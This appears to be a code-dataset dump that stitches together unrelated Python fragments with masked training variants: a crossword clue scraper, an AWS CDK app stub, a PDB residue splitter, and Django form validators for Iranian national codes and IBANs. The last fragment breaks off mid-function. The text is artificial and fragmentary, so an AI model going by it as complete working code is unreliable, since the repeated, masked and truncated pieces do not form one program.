return searchMerriamWebster(toSearch)
def getSynonyms(self, toSearch):
return searchSynonyms(toSearch, self.clues['across'], self.clues[
'down'])
def cheat(self):
for across in self.clues['across']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == across:
answer = ''
for colIn in range(0, 5):
if self.answers[row][colIn] != '-':
answer = answer + self.answers[row][colIn]
self.domains['across'][across] = self.domains['across'
][across] + ' ' + answer
for down in self.clues['down']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == down:
answer = ''
for rowIn in range(0, 5):
if self.answers[rowIn][col] != '-':
answer = answer + self.answers[rowIn][col]
self.domains['down'][down] = self.domains['down'][down
] + ' ' + answer
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from getMerriamWebster import searchMerriamWebster
from searchWikipedia import searchWikipedia
from synonyms import searchSynonyms
class Scraping:
def __init__(self, clues, answers, gridIndex):
self.clues = clues
self.domains = {"across": {}, "down":{}}
self.answers = answers
self.gridIndex = gridIndex
def setDomains(self):
for down in self.clues["down"]:
self.domains["down"][down] = self.search(self.clues["down"][down])
for across in self.clues["across"]:
self.domains["across"][across] = self.search(self.clues["across"][across])
#======================== CHEAT =============================
#self.cheat()
def getClueList(self, clue):
clueList = [clue]
return clueList
def search(self, clue):
domain = set()
wiki_set = set()
synonym_set = set()
toSearch = clue
"""
print("Google search for:", toSearch)
try:
domain = domain + self.getGoogle(toSearch)
except:
print("An exception occurred")
"""
print("Wikipedia search for:", toSearch)
try:
wiki_set = wiki_set | self.getWiki(toSearch)
except:
print("An exception occurred")
print("Synonym search from Datamuse and Merriam-Webster for:", toSearch)
try:
synonym_set = synonym_set | self.getSynonyms(toSearch)
except:
print("An exception occurred")
"""
print("Merriam Webster search for:", toSearch)
try:
merriam_set = merriam_set | self.getMerriam(toSearch)
except:
print("An exception occurred")
"""
domain = domain.union(wiki_set, synonym_set)
return ' '.join(str(e) for e in domain) #''.join(str(e) for e in words)
def getGoogle(self, toSearch):
return "toSearch"
def getWiki(self, toSearch):
return searchWikipedia(toSearch)
def getMerriam(self,toSearch):
return searchMerriamWebster(toSearch)
def getSynonyms(self, toSearch):
return searchSynonyms(toSearch, self.clues["across"], self.clues["down"])
def cheat(self):
for across in self.clues["across"]:
for row in range(0,5):
for col in range(0,5):
if self.gridIndex[row][col] == across:
answer = ""
for colIn in range(0,5):
if self.answers[row][colIn] != "-":
answer = answer + self.answers[row][colIn]
self.domains["across"][across] = self.domains["across"][across] + " " + answer
#print(answer)
for down in self.clues["down"]:
for row in range(0,5):
for col in range(0,5):
if self.gridIndex[row][col] == down:
answer = ""
for rowIn in range(0,5):
if self.answers[rowIn][col] != "-":
answer = answer + self.answers[rowIn][col]
self.domains["down"][down] = self.domains["down"][down] + " " + answer
#print(answer)
"""
scraping = Scraping()
scraping.setDomains()
print(scraping.domains)
"""
|
flexible
|
{
"blob_id": "138abb40fda0f19b4a74a294d5cd0dd326dc59ce",
"index": 7722,
"step-1": "<mask token>\n\n\nclass Scraping:\n\n def __init__(self, clues, answers, gridIndex):\n self.clues = clues\n self.domains = {'across': {}, 'down': {}}\n self.answers = answers\n self.gridIndex = gridIndex\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def getSynonyms(self, toSearch):\n return searchSynonyms(toSearch, self.clues['across'], self.clues[\n 'down'])\n\n def cheat(self):\n for across in self.clues['across']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == across:\n answer = ''\n for colIn in range(0, 5):\n if self.answers[row][colIn] != '-':\n answer = answer + self.answers[row][colIn]\n self.domains['across'][across] = self.domains['across'\n ][across] + ' ' + answer\n for down in self.clues['down']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == down:\n answer = ''\n for rowIn in range(0, 5):\n if self.answers[rowIn][col] != '-':\n answer = answer + self.answers[rowIn][col]\n self.domains['down'][down] = self.domains['down'][down\n ] + ' ' + answer\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Scraping:\n\n def __init__(self, clues, answers, gridIndex):\n self.clues = clues\n self.domains = {'across': {}, 'down': {}}\n self.answers = answers\n self.gridIndex = gridIndex\n <mask token>\n <mask token>\n\n def search(self, clue):\n domain = set()\n wiki_set = set()\n synonym_set = set()\n toSearch = clue\n \"\"\"\n print(\"Google search for:\", toSearch)\n try:\n domain = domain + self.getGoogle(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n print('Wikipedia search for:', toSearch)\n try:\n wiki_set = wiki_set | self.getWiki(toSearch)\n except:\n print('An exception occurred')\n print('Synonym search from Datamuse and Merriam-Webster for:', toSearch\n )\n try:\n synonym_set = synonym_set | self.getSynonyms(toSearch)\n except:\n print('An exception occurred')\n \"\"\"\n print(\"Merriam Webster search for:\", toSearch)\n try:\n merriam_set = merriam_set | self.getMerriam(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n domain = domain.union(wiki_set, synonym_set)\n return ' '.join(str(e) for e in domain)\n <mask token>\n\n def getWiki(self, toSearch):\n return searchWikipedia(toSearch)\n <mask token>\n\n def getSynonyms(self, toSearch):\n return searchSynonyms(toSearch, self.clues['across'], self.clues[\n 'down'])\n\n def cheat(self):\n for across in self.clues['across']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == across:\n answer = ''\n for colIn in range(0, 5):\n if self.answers[row][colIn] != '-':\n answer = answer + self.answers[row][colIn]\n self.domains['across'][across] = self.domains['across'\n ][across] + ' ' + answer\n for down in self.clues['down']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == down:\n answer = ''\n for rowIn in range(0, 5):\n if self.answers[rowIn][col] != '-':\n answer = answer + self.answers[rowIn][col]\n self.domains['down'][down] = self.domains['down'][down\n ] + ' ' + answer\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Scraping:\n\n def __init__(self, clues, answers, gridIndex):\n self.clues = clues\n self.domains = {'across': {}, 'down': {}}\n self.answers = answers\n self.gridIndex = gridIndex\n\n def setDomains(self):\n for down in self.clues['down']:\n self.domains['down'][down] = self.search(self.clues['down'][down])\n for across in self.clues['across']:\n self.domains['across'][across] = self.search(self.clues[\n 'across'][across])\n <mask token>\n\n def search(self, clue):\n domain = set()\n wiki_set = set()\n synonym_set = set()\n toSearch = clue\n \"\"\"\n print(\"Google search for:\", toSearch)\n try:\n domain = domain + self.getGoogle(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n print('Wikipedia search for:', toSearch)\n try:\n wiki_set = wiki_set | self.getWiki(toSearch)\n except:\n print('An exception occurred')\n print('Synonym search from Datamuse and Merriam-Webster for:', toSearch\n )\n try:\n synonym_set = synonym_set | self.getSynonyms(toSearch)\n except:\n print('An exception occurred')\n \"\"\"\n print(\"Merriam Webster search for:\", toSearch)\n try:\n merriam_set = merriam_set | self.getMerriam(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n domain = domain.union(wiki_set, synonym_set)\n return ' '.join(str(e) for e in domain)\n\n def getGoogle(self, toSearch):\n return 'toSearch'\n\n def getWiki(self, toSearch):\n return searchWikipedia(toSearch)\n\n def getMerriam(self, toSearch):\n return searchMerriamWebster(toSearch)\n\n def getSynonyms(self, toSearch):\n return searchSynonyms(toSearch, self.clues['across'], self.clues[\n 'down'])\n\n def cheat(self):\n for across in self.clues['across']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == across:\n answer = ''\n for colIn in range(0, 5):\n if self.answers[row][colIn] != '-':\n answer = answer + self.answers[row][colIn]\n self.domains['across'][across] = self.domains['across'\n ][across] + ' ' + answer\n for down in self.clues['down']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == down:\n answer = ''\n for rowIn in range(0, 5):\n if self.answers[rowIn][col] != '-':\n answer = answer + self.answers[rowIn][col]\n self.domains['down'][down] = self.domains['down'][down\n ] + ' ' + answer\n\n\n<mask token>\n",
"step-4": "from getMerriamWebster import searchMerriamWebster\nfrom searchWikipedia import searchWikipedia\nfrom synonyms import searchSynonyms\n\n\nclass Scraping:\n\n def __init__(self, clues, answers, gridIndex):\n self.clues = clues\n self.domains = {'across': {}, 'down': {}}\n self.answers = answers\n self.gridIndex = gridIndex\n\n def setDomains(self):\n for down in self.clues['down']:\n self.domains['down'][down] = self.search(self.clues['down'][down])\n for across in self.clues['across']:\n self.domains['across'][across] = self.search(self.clues[\n 'across'][across])\n\n def getClueList(self, clue):\n clueList = [clue]\n return clueList\n\n def search(self, clue):\n domain = set()\n wiki_set = set()\n synonym_set = set()\n toSearch = clue\n \"\"\"\n print(\"Google search for:\", toSearch)\n try:\n domain = domain + self.getGoogle(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n print('Wikipedia search for:', toSearch)\n try:\n wiki_set = wiki_set | self.getWiki(toSearch)\n except:\n print('An exception occurred')\n print('Synonym search from Datamuse and Merriam-Webster for:', toSearch\n )\n try:\n synonym_set = synonym_set | self.getSynonyms(toSearch)\n except:\n print('An exception occurred')\n \"\"\"\n print(\"Merriam Webster search for:\", toSearch)\n try:\n merriam_set = merriam_set | self.getMerriam(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n domain = domain.union(wiki_set, synonym_set)\n return ' '.join(str(e) for e in domain)\n\n def getGoogle(self, toSearch):\n return 'toSearch'\n\n def getWiki(self, toSearch):\n return searchWikipedia(toSearch)\n\n def getMerriam(self, toSearch):\n return searchMerriamWebster(toSearch)\n\n def getSynonyms(self, toSearch):\n return searchSynonyms(toSearch, self.clues['across'], self.clues[\n 'down'])\n\n def cheat(self):\n for across in self.clues['across']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == across:\n answer = ''\n for colIn in range(0, 5):\n if self.answers[row][colIn] != '-':\n answer = answer + self.answers[row][colIn]\n self.domains['across'][across] = self.domains['across'\n ][across] + ' ' + answer\n for down in self.clues['down']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == down:\n answer = ''\n for rowIn in range(0, 5):\n if self.answers[rowIn][col] != '-':\n answer = answer + self.answers[rowIn][col]\n self.domains['down'][down] = self.domains['down'][down\n ] + ' ' + answer\n\n\n<mask token>\n",
"step-5": "from getMerriamWebster import searchMerriamWebster\nfrom searchWikipedia import searchWikipedia\nfrom synonyms import searchSynonyms\n\nclass Scraping:\n def __init__(self, clues, answers, gridIndex):\n self.clues = clues\n self.domains = {\"across\": {}, \"down\":{}}\n self.answers = answers\n self.gridIndex = gridIndex\n\n def setDomains(self):\n for down in self.clues[\"down\"]:\n self.domains[\"down\"][down] = self.search(self.clues[\"down\"][down])\n for across in self.clues[\"across\"]:\n self.domains[\"across\"][across] = self.search(self.clues[\"across\"][across])\n #======================== CHEAT =============================\n #self.cheat()\n\n def getClueList(self, clue):\n clueList = [clue]\n return clueList\n\n def search(self, clue):\n domain = set()\n wiki_set = set()\n synonym_set = set()\n toSearch = clue\n \"\"\"\n print(\"Google search for:\", toSearch)\n try:\n domain = domain + self.getGoogle(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n print(\"Wikipedia search for:\", toSearch)\n try:\n\n wiki_set = wiki_set | self.getWiki(toSearch)\n except:\n print(\"An exception occurred\")\n \n print(\"Synonym search from Datamuse and Merriam-Webster for:\", toSearch)\n try:\n synonym_set = synonym_set | self.getSynonyms(toSearch)\n except:\n print(\"An exception occurred\")\n \n \"\"\"\n print(\"Merriam Webster search for:\", toSearch)\n try:\n merriam_set = merriam_set | self.getMerriam(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\" \n domain = domain.union(wiki_set, synonym_set)\n return ' '.join(str(e) for e in domain) #''.join(str(e) for e in words)\n\n def getGoogle(self, toSearch):\n\n return \"toSearch\"\n\n def getWiki(self, toSearch):\n return searchWikipedia(toSearch)\n\n def getMerriam(self,toSearch):\n return searchMerriamWebster(toSearch)\n\n def getSynonyms(self, toSearch):\n return searchSynonyms(toSearch, self.clues[\"across\"], self.clues[\"down\"])\n\n def cheat(self):\n for across in self.clues[\"across\"]:\n \n for row in range(0,5):\n for col in range(0,5):\n if self.gridIndex[row][col] == across:\n answer = \"\"\n for colIn in range(0,5):\n if self.answers[row][colIn] != \"-\":\n answer = answer + self.answers[row][colIn]\n self.domains[\"across\"][across] = self.domains[\"across\"][across] + \" \" + answer\n #print(answer)\n\n for down in self.clues[\"down\"]:\n \n for row in range(0,5):\n for col in range(0,5):\n if self.gridIndex[row][col] == down:\n answer = \"\"\n for rowIn in range(0,5):\n if self.answers[rowIn][col] != \"-\":\n answer = answer + self.answers[rowIn][col]\n self.domains[\"down\"][down] = self.domains[\"down\"][down] + \" \" + answer\n #print(answer)\n\n\n\"\"\"\nscraping = Scraping()\nscraping.setDomains()\nprint(scraping.domains)\n\"\"\"",
"step-ids": [
4,
6,
9,
11,
12
]
}
|
[
4,
6,
9,
11,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
MainStack(app, app, 'main')
app.synth()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
APP_NAME = 'etl-pm-pipeline-be'
app = PMIApp(APP_NAME)
MainStack(app, app, 'main')
app.synth()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from ias_pmi_cdk_common import PMIApp
from stacks import MainStack
APP_NAME = 'etl-pm-pipeline-be'
app = PMIApp(APP_NAME)
MainStack(app, app, 'main')
app.synth()
<|reserved_special_token_1|>
"""AWS CDK application.
See https://docs.aws.amazon.com/cdk/ for details.
"""
from ias_pmi_cdk_common import PMIApp
from stacks import MainStack
APP_NAME = 'etl-pm-pipeline-be'
# create CDK application
app = PMIApp(APP_NAME)
# add stacks
MainStack(app, app, 'main')
# synthesize application assembly
app.synth()
|
flexible
|
{
"blob_id": "dfbbbaf6b5f02c60ca48f7864068d59349c547d1",
"index": 5484,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nMainStack(app, app, 'main')\napp.synth()\n",
"step-3": "<mask token>\nAPP_NAME = 'etl-pm-pipeline-be'\napp = PMIApp(APP_NAME)\nMainStack(app, app, 'main')\napp.synth()\n",
"step-4": "<mask token>\nfrom ias_pmi_cdk_common import PMIApp\nfrom stacks import MainStack\nAPP_NAME = 'etl-pm-pipeline-be'\napp = PMIApp(APP_NAME)\nMainStack(app, app, 'main')\napp.synth()\n",
"step-5": "\"\"\"AWS CDK application.\n\nSee https://docs.aws.amazon.com/cdk/ for details.\n\n\"\"\"\n\nfrom ias_pmi_cdk_common import PMIApp\n\nfrom stacks import MainStack\n\n\nAPP_NAME = 'etl-pm-pipeline-be'\n\n\n# create CDK application\napp = PMIApp(APP_NAME)\n\n# add stacks\nMainStack(app, app, 'main')\n\n# synthesize application assembly\napp.synth()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
pdb = open(sys.argv[1])
name = sys.argv[2]
res = []
resid = None
for l in pdb:
if not l.startswith("ATOM"):
continue
if int(l[22:26]) != resid:
res.append([])
resid = int(l[22:26])
res[-1].append(l)
for i in range(len(res)-2):
outp = open("%s%d-%dr.pdb"%(name,i+1,i+3), "w")
for r in res[i:i+3]:
for j in r:
print >> outp, j,
|
normal
|
{
"blob_id": "d867d17b2873de7c63d0ff29eb585cce1a68dda6",
"index": 6081,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-3": "<mask token>\npdb = open(sys.argv[1])\nname = sys.argv[2]\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-4": "import sys\npdb = open(sys.argv[1])\nname = sys.argv[2]\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-5": "import sys\n\npdb = open(sys.argv[1])\nname = sys.argv[2]\n\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith(\"ATOM\"):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\n\nfor i in range(len(res)-2):\n outp = open(\"%s%d-%dr.pdb\"%(name,i+1,i+3), \"w\")\n for r in res[i:i+3]:\n for j in r:\n print >> outp, j,\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class FieldValidator:
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.validationPipeline = []
self.statusCode = 200
self.errors = {}
self.invalidFields = []
def flush(self):
self = FieldValidator()
def setError(self, field, error):
if field not in self.invalidFields:
fieldErrors = self.errors.get(field, [])
if error[0] not in fieldErrors:
self.errors[field] = fieldErrors + [error[0]]
self.statusCode = error[1]
self.invalidFields.append(field)
def getErrors(self):
return self.errors
def validate(self):
for validation in self.validationPipeline:
try:
validation['validator'](validation['data'])
except:
self.setError(validation['data']['field'], enum.Error.
INVALID_FIELD_DATA.value)
return self
def addValidation(self, data, validatorFunction):
if data['value'] == 'unAssigned' and data['field'] in self.data.keys():
data['value'] = self.data[data['field']]
elif data['value'] == 'unAssigned' and data['field'
] not in self.data.keys():
data['value'] = None
self.validationPipeline.append({'data': data, 'validator':
validatorFunction})
def _check_with_typeValidator(self, data):
if not isinstance(data['value'], data['type']):
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_nationalLegalCodeValidator(self, data):
nationalLegalCode = data['value']
result = 0
validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]
if len(nationalLegalCode) != 11:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
return
for i in range(10):
result += (int(nationalLegalCode[-2]) + 2 + int(
nationalLegalCode[i])) * validationList[i]
if result % 11 == 10:
reminder = 0
else:
reminder = result % 11
if reminder == int(nationalLegalCode[-1]):
valid = True
else:
valid = False
if valid is False:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
<|reserved_special_token_0|>
def _check_with_officer1NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer2NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_featuresValidator(self, data):
for i in data['value']:
if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',
'درگاه پرداخت اینترنتی']:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.
value)
break
def _check_with_userNameValidator(self, data):
username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])
if 'admin' in data['value'] or 'zibal' in data['value'
] or username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def _check_with_phoneNumberValidator(self, data):
if data['value'] is None or len(data) < 1:
self.setError(data['field'], enum.Error.
PHONE_INCORRECT_TEMPLATE.value)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _check_with_fileValidator(self, data):
file = data['value']
field = data['field']
if file is None:
self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)
return
elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:
self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)
types = data['options'].get('types', None)
valid = False
if types is not None:
for type in types:
valid = valid or type in file.content_type
if valid is False:
self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)
<|reserved_special_token_0|>
def _check_with_subMerchantBankAccountValidator(self, data):
if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID
=data['value']['subId'], status=1).exists():
self.setError(data['field'], enum.Error.
IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)
def _check_with_minDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) < data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_maxDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) > data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_equalDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) != data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_inputValidator(self, data):
if data['value'] is None or len(data['value']) < 1:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
def _check_with_IbanTransferable(self, data):
if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':
self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value
)
def _check_with_username(self, data):
username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])
if username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def checkType(self, field, type, value='unAssigned'):
self.addValidation({'field': field, 'type': type, 'value': value},
self._check_with_typeValidator)
return self
def checkNationalLegalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_nationalLegalCodeValidator)
return self
def checkOfficer1NationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_officer1NationalCodeValidator)
return self
def checkOfficer2NationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_officer2NationalCodeValidator)
return self
def checkNationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_nationalCodeValidator)
return self
def checkFeatures(self, field, features='unAssigned'):
self.addValidation({'field': field, 'value': features}, self.
_check_with_featuresValidator)
return self
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def checkEmail(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_emailValidator)
return self
def checkNotNone(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_noneValidator)
return self
def checkFile(self, field, data, **options):
self.addValidation({'field': field, 'value': data, 'options':
options}, self._check_with_fileValidator)
return self
def checkIBAN(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_IBANValidator)
return self
def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):
data = {'userId': userId, 'subId': subId}
self.addValidation({'field': field, 'value': data}, self.
_check_with_subMerchantBankAccountValidator)
return self
def checkDataLength(self, field, length, mode='equal', data='unAssigned'):
if mode == 'equal':
validatorFunction = self._check_with_equalDataLengthValidator
if mode == 'min':
validatorFunction = self._check_with_minDataLengthValidator
if mode == 'max':
validatorFunction = self._check_with_minDataLengthValidator
self.addValidation({'field': field, 'value': data, 'length': length
}, validatorFunction)
return self
def checkInputData(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_inputValidator)
return self
<|reserved_special_token_0|>
def checkIsIbanTransferable(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_IbanTransferable)
return self
<|reserved_special_token_0|>
class DataValidator:
def __init__(self, data={}):
self.fieldValidator = FieldValidator(data)
self.objectValidator = ObjectValidator()
self.errors = {}
self.statusCode = 200
def getValidatorsErrors(self):
self.objectValidator.validate()
self.fieldValidator.validate()
for key in self.fieldValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []
) + self.fieldValidator.getErrors()[key]
self.statusCode = self.fieldValidator.statusCode
for key in self.objectValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []
) + self.objectValidator.getErrors()[key]
self.statusCode = (self.objectValidator.statusCode if self.
objectValidator.statusCode != 200 else self.statusCode)
return self.errors
def generateMessage(self):
messages = []
errorKeys = self.errors.keys()
if 'email' in errorKeys:
messages.append(' آدرس ایمیل نامعتبر است')
if 'name' in errorKeys:
messages.append('نام را وارد کنید')
if 'username' in errorKeys:
messages.append('نام کاربری را وارد کنید')
if 'password' in errorKeys:
messages.append('رمز عبور را وارد کنید')
if 'mobile' in errorKeys:
messages.append('تلفن همراه خود را وارد کنید.')
if 'phone' in errorKeys:
messages.append(
'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')
if 'iban' in errorKeys or 'IBAN' in errorKeys:
messages.append(
'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'
)
if 'user' in errorKeys:
messages.append('لطفا وارد شوید')
return messages
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ObjectValidator:
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.statusCode = 200
self.validationPipeline = []
self.errors = {}
self.invalidFields = []
def flush(self):
self = ObjectValidator()
return self
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def addValidation(self, data, validatorFunction):
self.validationPipeline.append({'data': data, 'validator':
validatorFunction})
def _check_with_authenticationValidator(self, data):
if not data['user'].is_authenticated:
self.setError(data['field'], enum.Error.UNAUTHORIZED.value)
<|reserved_special_token_0|>
def _check_with_ObjectExistenceValidator(self, data):
model = data['model']
if not model.objects.filter(**data['filter']):
self.setError(data['field'], enum.Error.
GENERIC_OBJECT_NOT_FOUND.value)
<|reserved_special_token_0|>
def checkObjectExistence(self, field, model, **filter):
self.addValidation({'field': field, 'model': model, 'filter':
filter}, self._check_with_ObjectExistenceValidator)
return self
def checkUserAuthentication(self, field, user):
self.addValidation({'field': field, 'user': user}, self.
_check_with_authenticationValidator)
return self
class FieldValidator:
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.validationPipeline = []
self.statusCode = 200
self.errors = {}
self.invalidFields = []
def flush(self):
self = FieldValidator()
def setError(self, field, error):
if field not in self.invalidFields:
fieldErrors = self.errors.get(field, [])
if error[0] not in fieldErrors:
self.errors[field] = fieldErrors + [error[0]]
self.statusCode = error[1]
self.invalidFields.append(field)
def getErrors(self):
return self.errors
def validate(self):
for validation in self.validationPipeline:
try:
validation['validator'](validation['data'])
except:
self.setError(validation['data']['field'], enum.Error.
INVALID_FIELD_DATA.value)
return self
def addValidation(self, data, validatorFunction):
if data['value'] == 'unAssigned' and data['field'] in self.data.keys():
data['value'] = self.data[data['field']]
elif data['value'] == 'unAssigned' and data['field'
] not in self.data.keys():
data['value'] = None
self.validationPipeline.append({'data': data, 'validator':
validatorFunction})
def _check_with_typeValidator(self, data):
if not isinstance(data['value'], data['type']):
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_nationalLegalCodeValidator(self, data):
nationalLegalCode = data['value']
result = 0
validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]
if len(nationalLegalCode) != 11:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
return
for i in range(10):
result += (int(nationalLegalCode[-2]) + 2 + int(
nationalLegalCode[i])) * validationList[i]
if result % 11 == 10:
reminder = 0
else:
reminder = result % 11
if reminder == int(nationalLegalCode[-1]):
valid = True
else:
valid = False
if valid is False:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
def _check_with_nationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer1NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer2NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
